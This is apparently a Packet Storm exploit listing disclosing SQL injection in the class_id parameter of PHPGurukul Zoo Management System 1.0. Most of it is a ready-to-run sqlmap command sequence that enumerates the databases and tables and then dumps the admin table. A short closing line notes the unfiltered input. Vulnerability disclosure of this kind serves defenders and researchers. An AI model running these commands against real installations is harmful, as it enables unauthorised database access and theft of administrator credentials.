packetstorm | D4rkP0w4r, raw.githubusercontent.com | PACKETSTORM:166648
Apr 08, 2022 - 12:00 a.m.

PHPGurukul Zoo Management System 1.0 SQL Injection


EPSS: 0.002 (Low), percentile 56.2%

# Zoo Management System SQL Injection
# Author: D4rkP0w4r
* Description => SQL injection at /animals?class_id=1
* Injection Point

http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1

# Exploit
* Exploit with Sqlmap

```
python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --dbs

python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --tables -D zoomanagement

python3 sqlmap.py -u "http://192.168.1.101:8080/ZooManagementSystem/public_html/animals?class_id=1" --columns -D zoomanagement -T admin --dump
```

# Vulnerable Code

* `class_id` is not filtered when inserting data into the database
